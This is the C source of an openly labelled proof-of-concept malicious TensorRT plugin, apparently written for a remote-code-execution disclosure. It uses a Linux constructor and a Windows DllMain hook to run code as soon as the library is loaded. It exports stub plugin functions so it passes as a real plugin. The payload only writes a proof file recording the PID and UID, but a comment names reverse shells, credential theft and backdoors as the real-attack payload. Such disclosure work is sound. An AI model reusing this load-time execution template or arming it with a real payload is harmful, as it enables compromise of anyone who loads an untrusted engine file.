/* * Malicious TensorRT Plugin - Proof of Concept * * This shared library executes arbitrary code when loaded. * - Linux: __attribute__((constructor)) runs on dlopen() * - Windows: DllMain with DLL_PROCESS_ATTACH runs on LoadLibrary() * * Both execute BEFORE any TensorRT API interaction. * * For PoC: creates a proof file and prints to stderr. * In a real attack: reverse shell, credential theft, backdoor, etc. */ #include #include #ifdef _WIN32 #include #include BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) { /* PoC: Write proof of execution */ FILE *f = fopen("C:\\temp\\tensorrt_rce_poc.txt", "w"); if (!f) f = fopen("tensorrt_rce_poc.txt", "w"); if (f) { fprintf(f, "TensorRT Engine RCE PoC - Code executed via embedded plugin LoadLibrary()\n"); fprintf(f, "PID: %d\n", _getpid()); fclose(f); } fprintf(stderr, "\n[!] TensorRT RCE PoC: Arbitrary code executed via embedded plugin!\n"); fprintf(stderr, "[!] Proof written to tensorrt_rce_poc.txt\n"); fprintf(stderr, "[!] PID: %d\n\n", _getpid()); } return TRUE; } /* TensorRT plugin stubs */ __declspec(dllexport) void setLoggerFinder(void *finder) { (void)finder; } __declspec(dllexport) void* getCreators(int *n) { if (n) *n = 0; return NULL; } #else #include __attribute__((constructor)) void malicious_init(void) { FILE *f = fopen("/tmp/tensorrt_rce_poc", "w"); if (f) { fprintf(f, "TensorRT Engine RCE PoC - Code executed via embedded plugin dlopen()\n"); fprintf(f, "PID: %d\nUID: %d\n", getpid(), getuid()); fclose(f); } fprintf(stderr, "\n[!] TensorRT RCE PoC: Arbitrary code executed via embedded plugin!\n"); fprintf(stderr, "[!] Proof written to /tmp/tensorrt_rce_poc\n"); fprintf(stderr, "[!] PID: %d, UID: %d\n\n", getpid(), getuid()); } /* TensorRT plugin stubs */ void setLoggerFinder(void *finder) { (void)finder; } void* getCreators(int *n) { if (n) *n = 0; return NULL; } #endif